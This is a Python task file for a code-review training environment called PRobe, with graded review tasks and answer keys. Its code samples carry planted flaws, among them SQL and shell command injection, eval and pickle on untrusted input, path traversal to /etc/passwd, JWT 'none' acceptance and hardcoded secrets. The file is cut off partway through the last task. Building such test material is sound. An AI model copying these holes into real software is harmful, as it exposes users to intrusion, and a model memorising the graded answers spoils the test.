Spaces:
Runtime error
Runtime error
| """ | |
| Task definitions for the PRobe environment. | |
| Seven tasks (ids 0-6) across four difficulty tiers. Each task defines: | |
| - code: Python source to review | |
| - issues: list of ground-truth issues with grading metadata | |
| - correct_decision: expected final review decision | |
| Difficulty ladder: | |
| 0 ultra-easy — hints embedded in comments; bootstraps GRPO positive trajectories | |
| 1 easy — 3 clean logic bugs, no hints | |
| 2 medium — 5 security issues in an auth module | |
| 3 hard — 7 mixed issues in a data pipeline | |
| 4 medium — 5 async concurrency bugs | |
| 5 hard — 6 Flask API security issues | |
| 6 hard — causal-chain secrets-leak investigation of a JWT auth service | |
| """ | |
| from typing import Any | |
| TASKS: list[dict[str, Any]] = [ | |
| # ── Task 0: Ultra-easy (bootstrap) ─────────────────────────────────────── | |
| # DESIGN INTENT: both issues have their category name spelled out in a code | |
| # comment directly above them. A frozen weak model that simply reads the | |
| # comments and echoes them back should reliably score > 0. This task exists | |
| # solely to guarantee that GRPO has at least a few positive trajectories from | |
| # training step 1. | |
| { | |
| "id": 0, | |
| "name": "Bootstrap: Obvious Issues", | |
| "difficulty": "ultra-easy", | |
| "file_name": "bootstrap.py", | |
| "description": ( | |
| "Review this short Python module. " | |
| "The comments above each function hint at the kind of issue present. " | |
| "Add a comment for each bug you find (line number, severity, category), " | |
| "call request_changes, then submit." | |
| ), | |
| "max_steps": 6, | |
| "code": """\ | |
| # BUG: this loop has an off-by-one error β it iterates one index too far | |
| def sum_items(data): | |
| total = 0 | |
| for i in range(len(data) + 1): # line 4: causes IndexError on last iteration | |
| total += data[i] | |
| return total | |
| # SECURITY: hardcoded credential β move to environment variable | |
| def connect_db(): | |
| db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source | |
| return f"postgresql://admin:{db_password}@localhost/mydb" | |
| """, | |
| "issues": [ | |
| { | |
| "id": "bootstrap_off_by_one", | |
| "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", | |
| "line_range": (4, 4), | |
| "keywords": [ | |
| "off-by-one", "off by one", "bug", "index", "indexerror", | |
| "range", "+ 1", "len + 1", "out of bounds", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "bootstrap_hardcoded_cred", | |
| "description": "Hardcoded password in source should be an environment variable", | |
| "line_range": (11, 11), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "security", "credential", "password", | |
| "secret", "env", "environment variable", "os.environ", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ── Task 1: Easy ───────────────────────────────────────────────────────── | |
| { | |
| "id": 1, | |
| "name": "Basic Bug Detection", | |
| "difficulty": "easy", | |
| "file_name": "utils.py", | |
| "description": ( | |
| "Review this Python utility module. " | |
| "Identify any bugs, logical errors, or code quality issues. " | |
| "Add a comment for each issue you find (include line number, severity, " | |
| "and category), then submit your review." | |
| ), | |
| "max_steps": 15, | |
| "code": """\ | |
| def calculate_average(numbers): | |
| \"\"\"Calculate the average of a list of numbers.\"\"\" | |
| total = 0 | |
| for i in range(len(numbers) + 1): # line 4 | |
| total += numbers[i] | |
| average = total / len(numbers) | |
| unused_result = sorted(numbers) # line 7 | |
| return average | |
| def find_max(items): | |
| \"\"\"Return the maximum value in a list.\"\"\" | |
| if len(items) == 0: | |
| return None | |
| max_val = items[0] | |
| for item in items: | |
| if item > max_val: | |
| max_val == item # line 17: should be =, not == | |
| return max_val | |
| def is_palindrome(s): | |
| \"\"\"Check if a string is a palindrome.\"\"\" | |
| return s == s[::-1] | |
| """, | |
| "issues": [ | |
| { | |
| "id": "off_by_one", | |
| "description": "Off-by-one: range(len+1) causes IndexError on the last iteration", | |
| "line_range": (4, 5), | |
| "keywords": [ | |
| "off-by-one", "off by one", "range", "index", "indexerror", | |
| "out of bounds", "len + 1", "+ 1", "index out", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "unused_variable", | |
| "description": "unused_result is assigned but never used", | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "unused", "unused_result", "never used", "dead code", | |
| "not used", "unnecessary", | |
| ], | |
| "category": "style", | |
| "severity": "info", | |
| "weight": 0.5, | |
| }, | |
| { | |
| "id": "assignment_not_update", | |
| "description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated", | |
| "line_range": (17, 17), | |
| "keywords": [ | |
| "==", "assignment", "comparison", "max_val", "never update", | |
| "not updating", "wrong operator", "should be =", "max never", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ── Task 2: Medium ─────────────────────────────────────────────────────── | |
| { | |
| "id": 2, | |
| "name": "Security Vulnerability Review", | |
| "difficulty": "medium", | |
| "file_name": "auth.py", | |
| "description": ( | |
| "Review this authentication module for security vulnerabilities. " | |
| "Pay careful attention to credential handling, input sanitization, " | |
| "and cryptographic choices. Annotate every issue with its severity " | |
| "and category, then submit your review." | |
| ), | |
| "max_steps": 20, | |
| "code": """\ | |
| import sqlite3 | |
| import hashlib | |
| import os | |
| DB_PASSWORD = "super_secret_123" # line 5 | |
| ADMIN_TOKEN = "tok_admin_abc123" # line 6 | |
| def authenticate_user(username, password): | |
| \"\"\"Authenticate a user against the database.\"\"\" | |
| conn = sqlite3.connect('app.db') | |
| cursor = conn.cursor() | |
| # line 12: f-string interpolation β SQL injection | |
| query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" | |
| cursor.execute(query) | |
| user = cursor.fetchone() | |
| conn.close() | |
| return user is not None | |
| def hash_password(password): | |
| \"\"\"Hash a password for storage.\"\"\" | |
| return hashlib.md5(password.encode()).hexdigest() # line 21 | |
| def execute_admin_command(command): | |
| \"\"\"Execute an admin maintenance command.\"\"\" | |
| result = eval(command) # line 25 | |
| return result | |
| def get_user_data(user_id): | |
| \"\"\"Fetch user profile from internal service.\"\"\" | |
| import requests | |
| url = f"https://internal-api/users/{user_id}" | |
| response = requests.get(url, verify=False) # line 32 | |
| return response.json() | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_credentials", | |
| "description": "Credentials hard-coded in source (lines 5-6)", | |
| "line_range": (5, 6), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "hard coded", "hardcode", | |
| "db_password", "admin_token", "plaintext credential", | |
| "environment variable", "env var", "os.environ", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "sql_injection", | |
| "description": "SQL injection via unsanitised f-string interpolation", | |
| "line_range": (12, 14), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "sanitize", "escape", "prepared statement", "placeholder", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "weak_hashing", | |
| "description": "MD5 is cryptographically broken for password storage", | |
| "line_range": (21, 21), | |
| "keywords": [ | |
| "md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt", | |
| "cryptographic", "password hashing", "hash", "broken", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "arbitrary_code_execution", | |
| "description": "eval() on untrusted input allows arbitrary code execution", | |
| "line_range": (25, 25), | |
| "keywords": [ | |
| "eval", "arbitrary code", "code execution", "rce", | |
| "remote code", "dangerous", "unsafe", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "ssl_verification_disabled", | |
| "description": "verify=False disables TLS cert validation, enabling MITM attacks", | |
| "line_range": (32, 32), | |
| "keywords": [ | |
| "ssl", "verify", "certificate", "mitm", | |
| "man-in-the-middle", "tls", "verify=false", "cert", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ── Task 3: Hard ───────────────────────────────────────────────────────── | |
| { | |
| "id": 3, | |
| "name": "Full Architecture and Performance Review", | |
| "difficulty": "hard", | |
| "file_name": "data_pipeline.py", | |
| "description": ( | |
| "Perform a comprehensive review of this data pipeline. " | |
| "Identify bugs, security vulnerabilities, performance bottlenecks, " | |
| "and architectural design issues. Each comment should clearly explain " | |
| "the problem and suggest a fix. Submit your review when done." | |
| ), | |
| "max_steps": 30, | |
| "code": """\ | |
| import requests | |
| import json | |
| import time | |
| from threading import Thread | |
| API_KEY = "sk-prod-abc123def456" # line 6 | |
| class DataPipeline: | |
| def __init__(self, endpoint): | |
| self.endpoint = endpoint | |
| self.results = [] | |
| self.cache = {} # line 13: unbounded | |
| def fetch_batch(self, item_ids): | |
| \"\"\"Fetch items from the API.\"\"\" | |
| items = [] | |
| for item_id in item_ids: # line 17: N+1 pattern | |
| response = requests.get( | |
| f"{self.endpoint}/items/{item_id}", | |
| headers={"Authorization": f"Bearer {API_KEY}"}, | |
| verify=False, # line 22 | |
| ) | |
| items.append(response.json()) | |
| return items | |
| def process_items(self, items): | |
| \"\"\"Transform items for storage.\"\"\" | |
| results = [] | |
| for i in range(len(items)): # line 28: use enumerate | |
| item = items[i] | |
| transformed = { | |
| "id": item["id"], # line 31: KeyError not handled | |
| "value": item["value"] * 2, | |
| "label": item.get("label", "unknown"), | |
| } | |
| results.append(transformed) | |
| self.cache[item["id"]] = transformed # line 36 | |
| return results | |
| def run_async(self, func, *args): | |
| \"\"\"Run function in a background thread.\"\"\" | |
| t = Thread(target=func, args=args) | |
| t.start() | |
| # line 43: thread not tracked or joined β resource leak | |
| def save_results(self, results, output_path): | |
| \"\"\"Persist results to disk.\"\"\" | |
| with open(output_path, "w") as f: | |
| json.dump(results, f) | |
| def retry_failed(self, failed_ids, max_retries=10): # line 50 | |
| \"\"\"Re-fetch items that previously failed.\"\"\" | |
| for item_id in failed_ids: | |
| for attempt in range(max_retries): | |
| try: | |
| result = requests.get( | |
| f"{self.endpoint}/items/{item_id}" | |
| ) | |
| if result.status_code == 200: | |
| self.results.append(result.json()) | |
| break | |
| except Exception: | |
| time.sleep(1) # line 60: no exponential backoff | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_api_key", | |
| "description": "API key hard-coded in source instead of an environment variable", | |
| "line_range": (6, 6), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "hardcode", "api key", "api_key", | |
| "environment variable", "env var", "os.environ", "sk-prod", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals batch endpoint docs — shows N+1 was also avoidable | |
| "unlocks": "api_docs_hint", | |
| }, | |
| { | |
| "id": "n_plus_one_requests", | |
| "description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint", | |
| "line_range": (17, 24), | |
| "keywords": [ | |
| "n+1", "n plus 1", "batch", "bulk", "loop", | |
| "individual request", "serial", "one request per", | |
| ], | |
| "category": "performance", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "ssl_disabled", | |
| "description": "SSL certificate verification disabled (verify=False)", | |
| "line_range": (22, 22), | |
| "keywords": [ | |
| "ssl", "verify", "certificate", "tls", | |
| "mitm", "verify=false", "cert", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| # Reveals network topology — confirms direct internet exposure | |
| "unlocks": "network_topology_hint", | |
| }, | |
| { | |
| "id": "missing_key_error_handling", | |
| "description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads", | |
| "line_range": (31, 32), | |
| "keywords": [ | |
| "keyerror", "key error", "error handling", "missing key", | |
| "exception", "try", ".get(", "dict access", | |
| ], | |
| "category": "bug", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "unbounded_cache", | |
| "description": "self.cache grows without bound; will cause OOM on large inputs", | |
| "line_range": (13, 13), | |
| "keywords": [ | |
| "unbounded", "memory leak", "cache size", "limit", | |
| "lru", "eviction", "grow", "oom", "memory", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "thread_not_joined", | |
| "description": "Thread is started but never stored or joined β silent resource/exception leak", | |
| "line_range": (40, 43), | |
| "keywords": [ | |
| "thread", "join", "track", "resource leak", | |
| "daemon", "not joined", "not tracked", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "no_exponential_backoff", | |
| "description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API", | |
| "line_range": (50, 60), | |
| "keywords": [ | |
| "backoff", "exponential", "retry", "sleep", "rate limit", | |
| "jitter", "aggressive", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.5, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ── Causal context hints ────────────────────────────────────────── | |
| # Finding the hardcoded API key reveals the upstream API docs, showing | |
| # a bulk endpoint exists — making the N+1 pattern even more damning. | |
| # Finding the SSL issue reveals the network topology, confirming the | |
| # service is directly internet-facing with no TLS termination proxy. | |
| "context_hints": { | |
| "api_docs_hint": ( | |
| "=== UNLOCKED: Upstream API Documentation (excerpt) ===\n" | |
| " GET /items/{id} β fetch a single item\n" | |
| " POST /items/batch β fetch up to 500 items in one request\n" | |
| " body: {\"ids\": [1, 2, ...]}\n" | |
| "NOTE: A batch endpoint already exists. The current code issues one\n" | |
| "request per item instead of using /items/batch, amplifying the\n" | |
| "credential-exposure risk: every request carries the leaked API_KEY." | |
| ), | |
| "network_topology_hint": ( | |
| "=== UNLOCKED: Deployment Network Map ===\n" | |
| " Internet β DataPipeline service (no TLS proxy) β upstream API\n" | |
| " The DataPipeline pod has a public IP and no WAF in front of it.\n" | |
| "NOTE: verify=False combined with direct internet exposure means\n" | |
| "any network path between the pod and the upstream API is vulnerable\n" | |
| "to a man-in-the-middle attack with no detection mechanism." | |
| ), | |
| }, | |
| }, | |
| # ── Task 4: Medium — Async Concurrency ─────────────────────────────── | |
| { | |
| "id": 4, | |
| "name": "Async Worker Review", | |
| "difficulty": "medium", | |
| "file_name": "async_worker.py", | |
| "description": ( | |
| "Review this async worker module for concurrency bugs, " | |
| "resource leaks, and exception-handling problems. " | |
| "Comment on every issue with its line number, severity, " | |
| "and category, then submit your review." | |
| ), | |
| "max_steps": 20, | |
| "code": """\ | |
| import asyncio | |
| import aiohttp | |
| _counter = 0 # line 3: shared mutable state, not thread/task-safe | |
| async def fetch_url(url: str) -> dict: | |
| \"\"\"Fetch a URL and return JSON.\"\"\" | |
| session = aiohttp.ClientSession() # line 7: session never closed β resource leak | |
| async with session.get(url) as resp: | |
| return await resp.json() | |
| async def increment_and_fetch(url: str) -> dict: | |
| \"\"\"Increment shared counter then fetch.\"\"\" | |
| global _counter | |
| _counter += 1 # line 15: race condition β not atomic in concurrent tasks | |
| data = fetch_url(url) # line 16: missing await β returns coroutine, not result | |
| return data | |
| async def run_all(urls: list) -> list: | |
| \"\"\"Run all fetches concurrently.\"\"\" | |
| tasks = [increment_and_fetch(u) for u in urls] | |
| results = [] | |
| for coro in tasks: | |
| try: | |
| result = await coro | |
| results.append(result) | |
| except Exception: | |
| pass # line 27: swallows all exceptions silently | |
| return results | |
| async def retry_fetch(url: str, retries: int = 3) -> dict: | |
| \"\"\"Fetch with retry logic.\"\"\" | |
| for attempt in range(retries): | |
| try: | |
| return await fetch_url(url) | |
| except Exception as e: | |
| if attempt == retries - 1: | |
| raise | |
| await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff | |
| """, | |
| "issues": [ | |
| { | |
| "id": "shared_mutable_state", | |
| "description": "Module-level _counter mutated by concurrent tasks without a lock", | |
| "line_range": (3, 3), | |
| "keywords": [ | |
| "shared", "race condition", "thread-safe", "task-safe", | |
| "atomic", "lock", "asyncio.lock", "concurrent", "global", | |
| "mutable", "not safe", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "unclosed_session", | |
| "description": "aiohttp.ClientSession created inside function is never closed β resource leak", | |
| "line_range": (7, 9), | |
| "keywords": [ | |
| "session", "not closed", "resource leak", "close", "context manager", | |
| "async with", "clientsession", "leak", "aiohttp", | |
| ], | |
| "category": "bug", | |
| "severity": "error", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "missing_await", | |
| "description": "fetch_url(url) called without await β returns unawaited coroutine", | |
| "line_range": (16, 16), | |
| "keywords": [ | |
| "await", "missing await", "coroutine", "not awaited", "unawaited", | |
| "returns coroutine", | |
| ], | |
| "category": "bug", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "silent_exception", | |
| "description": "bare except: pass swallows all exceptions, hiding errors", | |
| "line_range": (27, 27), | |
| "keywords": [ | |
| "swallow", "silent", "bare except", "exception", "pass", | |
| "ignore", "hidden", "suppress", "logging", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "no_backoff", | |
| "description": "Retry sleep is flat 1 s; should use exponential backoff with jitter", | |
| "line_range": (38, 38), | |
| "keywords": [ | |
| "backoff", "exponential", "jitter", "retry", "sleep", | |
| "flat", "rate limit", | |
| ], | |
| "category": "design", | |
| "severity": "warning", | |
| "weight": 0.5, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| }, | |
| # ── Task 5: Hard — Flask API Vulnerabilities ────────────────────────── | |
| { | |
| "id": 5, | |
| "name": "Flask API Security Review", | |
| "difficulty": "hard", | |
| "file_name": "api_server.py", | |
| "description": ( | |
| "Perform a thorough security review of this Flask REST API. " | |
| "Look for injection flaws, path traversal, insecure deserialization, " | |
| "sensitive data exposure, and missing access controls. " | |
| "Comment on every issue, then submit your review." | |
| ), | |
| "max_steps": 30, | |
| "code": """\ | |
| import os | |
| import pickle | |
| import subprocess | |
| import logging | |
| from flask import Flask, request, jsonify, send_file | |
| app = Flask(__name__) | |
| SECRET_KEY = "flask-secret-hardcoded" # line 8 | |
| logging.basicConfig(level=logging.DEBUG) | |
| @app.route("/run", methods=["POST"]) | |
| def run_command(): | |
| \"\"\"Run a system command and return output.\"\"\" | |
| cmd = request.json.get("command", "") | |
| # line 15: unsanitised shell command β OS command injection | |
| result = subprocess.check_output(cmd, shell=True, text=True) | |
| return jsonify({"output": result}) | |
| @app.route("/files", methods=["GET"]) | |
| def get_file(): | |
| \"\"\"Serve a file from the data directory.\"\"\" | |
| filename = request.args.get("name", "") | |
| # line 23: no path normalisation β path traversal | |
| path = os.path.join("/app/data", filename) | |
| return send_file(path) | |
| @app.route("/load", methods=["POST"]) | |
| def load_object(): | |
| \"\"\"Deserialise a user-supplied payload.\"\"\" | |
| data = request.get_data() | |
| # line 30: pickle.loads on untrusted data β arbitrary code execution | |
| obj = pickle.loads(data) | |
| return jsonify({"type": str(type(obj))}) | |
| @app.route("/login", methods=["POST"]) | |
| def login(): | |
| \"\"\"Authenticate and return a token.\"\"\" | |
| username = request.json.get("username") | |
| password = request.json.get("password") | |
| # line 38: credentials logged at DEBUG level | |
| logging.debug(f"Login attempt: username={username} password={password}") | |
| if username == "admin" and password == SECRET_KEY: | |
| return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response | |
| return jsonify({"error": "unauthorized"}), 401 | |
| @app.route("/admin", methods=["GET"]) | |
| def admin_panel(): | |
| \"\"\"Return admin data β no auth check.\"\"\" | |
| # line 47: no authentication or authorisation check | |
| return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}}) | |
| """, | |
| "issues": [ | |
| { | |
| "id": "hardcoded_secret", | |
| "description": "Flask SECRET_KEY hard-coded in source; should come from env var", | |
| "line_range": (8, 8), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "secret_key", "environment variable", | |
| "env var", "os.environ", "secret", "hardcode", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "command_injection", | |
| "description": "subprocess.check_output with shell=True and unsanitised user input β OS command injection", | |
| "line_range": (15, 16), | |
| "keywords": [ | |
| "command injection", "shell injection", "shell=true", "subprocess", | |
| "os injection", "arbitrary command", "unsanitised", "sanitize", | |
| "injection", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals server deployment config — shows shell access = full host compromise | |
| "unlocks": "server_config_hint", | |
| }, | |
| { | |
| "id": "path_traversal", | |
| "description": "No path normalisation allows ../../../etc/passwd-style traversal", | |
| "line_range": (23, 24), | |
| "keywords": [ | |
| "path traversal", "directory traversal", "path normaliz", | |
| "os.path.abspath", "realpath", "../", "dot dot", | |
| "escape", "filename", "traversal", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "insecure_deserialization", | |
| "description": "pickle.loads on untrusted user data allows arbitrary code execution", | |
| "line_range": (30, 31), | |
| "keywords": [ | |
| "pickle", "deserialization", "deserialisation", "arbitrary code", | |
| "untrusted", "rce", "remote code", "insecure deserialization", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Reveals client usage pattern — shows external clients send pickle payloads | |
| "unlocks": "client_usage_hint", | |
| }, | |
| { | |
| "id": "credentials_in_logs", | |
| "description": "Plaintext username and password written to DEBUG log", | |
| "line_range": (38, 38), | |
| "keywords": [ | |
| "log", "logging", "credential", "password", "sensitive", | |
| "plaintext", "debug", "leak", "exposure", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| }, | |
| { | |
| "id": "missing_auth_check", | |
| "description": "Admin endpoint has no authentication or authorisation guard", | |
| "line_range": (47, 47), | |
| "keywords": [ | |
| "auth", "authentication", "authorization", "authorisation", | |
| "access control", "no check", "unprotected", "unauthenticated", | |
| "missing auth", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ── Causal context hints ────────────────────────────────────────── | |
| # Finding command_injection reveals the host deployment context, | |
| # escalating severity from "code bug" to "full host compromise". | |
| # Finding insecure_deserialization reveals client usage patterns, | |
| # confirming the /load endpoint is actively used by external scripts. | |
| "context_hints": { | |
| "server_config_hint": ( | |
| "=== UNLOCKED: Server Deployment Configuration ===\n" | |
| " The Flask app runs as root inside a Docker container with:\n" | |
| " --privileged flag set\n" | |
| " host network mode (--network=host)\n" | |
| " /var/run/docker.sock mounted read-write\n" | |
| "NOTE: Command injection on this host is not just a container escape β\n" | |
| "the app runs as root with Docker socket access, giving an attacker\n" | |
| "full control of the host and all sibling containers." | |
| ), | |
| "client_usage_hint": ( | |
| "=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n" | |
| " # Example client code used by 3 internal services:\n" | |
| " import pickle, requests\n" | |
| " payload = pickle.dumps(MyObject(user_input))\n" | |
| " requests.post('https://api.internal/load', data=payload)\n" | |
| "NOTE: At least 3 internal services send user-controlled pickle\n" | |
| "payloads to /load. Any of those services being compromised allows\n" | |
| "a lateral-movement RCE attack through this endpoint." | |
| ), | |
| }, | |
| }, | |
| # ── Task 6: Causal Chain — Secrets Leak Investigation ──────────────────── | |
| # | |
| # WORLD-MODELING DESIGN | |
| # ───────────────────── | |
| # This task implements a *causal observation chain*: | |
| # | |
| # Phase 1 (lines visible from the start) | |
| # The agent sees a Flask service with two obvious surface issues. | |
| # Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context. | |
| # | |
| # Phase 2 (revealed after issue A is found) | |
| # A hidden DB schema snippet is appended to the observation, exposing | |
| # a privilege-escalation path that only makes sense once the secret | |
| # leak is understood. This rewards genuine causal reasoning: | |
| # "the leaked secret lets an attacker forge admin tokens → they can | |
| # reach the unguarded /admin/promote endpoint → full privilege | |
| # escalation." | |
| # | |
| # Phase 3 (revealed after issue B is found) | |
| # After the agent flags the missing rate-limit, the server's nginx | |
| # config fragment is revealed, showing that /auth is also missing | |
| # the global IP-allowlist — confirming the attack surface is wider | |
| # than the code alone suggests. | |
| # | |
| # The chained field `"unlocks"` in each issue entry names the context_key | |
| # that the environment injects into the observation when that issue is found. | |
| # The environment layer reads this and appends the hint to `context_hints`. | |
| { | |
| "id": 6, | |
| "name": "Causal Secrets Leak Investigation", | |
| "difficulty": "hard", | |
| "file_name": "auth_service.py", | |
| "description": ( | |
| "Review this authentication service carefully. " | |
| "Some issues unlock additional context about the wider system β " | |
| "read every new hint you receive before continuing. " | |
| "Use get_context on any suspicious line to reveal surrounding detail. " | |
| "Identify all issues, then submit your review." | |
| ), | |
| "max_steps": 35, | |
| "code": """\ | |
| import jwt | |
| import sqlite3 | |
| import time | |
| from flask import Flask, request, jsonify | |
| app = Flask(__name__) | |
| # ---- configuration ---------------------------------------------------------- | |
| JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret | |
| JWT_ALGORITHM = "HS256" | |
| # ---- helpers ---------------------------------------------------------------- | |
| def create_token(user_id: int, role: str) -> str: | |
| payload = { | |
| "sub": user_id, | |
| "role": role, | |
| "exp": time.time() + 3600, | |
| } | |
| return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) | |
| def verify_token(token: str) -> dict: | |
| # line 23: algorithm not pinned β accepts ["none"] attack if lib < 2.0 | |
| return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"]) | |
| # ---- routes ----------------------------------------------------------------- | |
| @app.route("/auth", methods=["POST"]) | |
| def authenticate(): | |
| \"\"\"Issue a JWT for valid credentials.\"\"\" | |
| body = request.get_json(force=True) | |
| uname = body.get("username", "") | |
| pwd = body.get("password", "") | |
| # line 33: no rate limiting β brute-force possible | |
| conn = sqlite3.connect("users.db") | |
| cursor = conn.cursor() | |
| # line 37: f-string SQL β injection | |
| cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'") | |
| row = cursor.fetchone() | |
| conn.close() | |
| if row: | |
| return jsonify({"token": create_token(row[0], row[1])}) | |
| return jsonify({"error": "invalid credentials"}), 401 | |
| @app.route("/admin/promote", methods=["POST"]) | |
| def promote_user(): | |
| \"\"\"Promote a user to admin β JWT required.\"\"\" | |
| token = request.headers.get("Authorization", "").replace("Bearer ", "") | |
| try: | |
| claims = verify_token(token) | |
| except Exception: | |
| return jsonify({"error": "unauthorized"}), 401 | |
| # line 51: role taken directly from token β no DB re-validation | |
| if claims.get("role") == "admin": | |
| target = request.json.get("user_id") | |
| conn = sqlite3.connect("users.db") | |
| conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection | |
| conn.commit() | |
| conn.close() | |
| return jsonify({"promoted": target}) | |
| return jsonify({"error": "forbidden"}), 403 | |
| """, | |
| # ── Ground-truth issues ─────────────────────────────────────────── | |
| "issues": [ | |
| { | |
| "id": "hardcoded_jwt_secret", | |
| "description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens", | |
| "line_range": (9, 9), | |
| "keywords": [ | |
| "hardcoded", "hard-coded", "jwt_secret", "secret", "jwt", | |
| "environment variable", "env var", "os.environ", "forge", | |
| "hardcode", "token secret", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| # Finding this issue unlocks the DB schema context hint | |
| "unlocks": "db_schema_hint", | |
| }, | |
| { | |
| "id": "jwt_none_algorithm", | |
| "description": ( | |
| "jwt.decode accepts 'none' algorithm β attacker can craft an " | |
| "unsigned token and bypass signature verification" | |
| ), | |
| "line_range": (23, 24), | |
| "keywords": [ | |
| "none", "algorithm", "alg", "unsigned", "bypass", | |
| "jwt", "signature", "verify", "none algorithm", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "no_rate_limit", | |
| "description": "/auth endpoint has no rate limiting β susceptible to brute-force", | |
| "line_range": (33, 34), | |
| "keywords": [ | |
| "rate limit", "rate-limit", "brute force", "brute-force", | |
| "throttle", "throttling", "flood", "limit", "attempts", | |
| ], | |
| "category": "security", | |
| "severity": "error", | |
| "weight": 0.75, | |
| # Finding this unlocks the nginx config hint | |
| "unlocks": "nginx_config_hint", | |
| }, | |
| { | |
| "id": "sql_injection_auth", | |
| "description": "f-string interpolation in SQL query on /auth β injection", | |
| "line_range": (37, 38), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "sanitize", "escape", "prepared statement", "placeholder", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "role_from_token_only", | |
| "description": ( | |
| "Role is read directly from the JWT payload without re-checking the DB β " | |
| "a forged or stale token grants permanent privilege" | |
| ), | |
| "line_range": (51, 52), | |
| "keywords": [ | |
| "role", "token", "db", "database", "re-check", "revalidat", | |
| "stale", "privilege", "escalation", "claims", "payload", | |
| "not verified", "trust", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| { | |
| "id": "sql_injection_promote", | |
| "description": "f-string SQL in /admin/promote UPDATE query β second-order injection", | |
| "line_range": (55, 55), | |
| "keywords": [ | |
| "sql injection", "sql", "injection", "f-string", "parameterized", | |
| "prepared statement", "placeholder", "update", "second order", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| }, | |
| ], | |
| "correct_decision": "request_changes", | |
| # ── Causal context hints — revealed progressively ───────────────── | |
| # Each value is injected into the observation once the triggering | |
| # issue is found. The agent must incorporate this new information | |
| # into its ongoing world model. | |
| "context_hints": { | |
| "db_schema_hint": ( | |
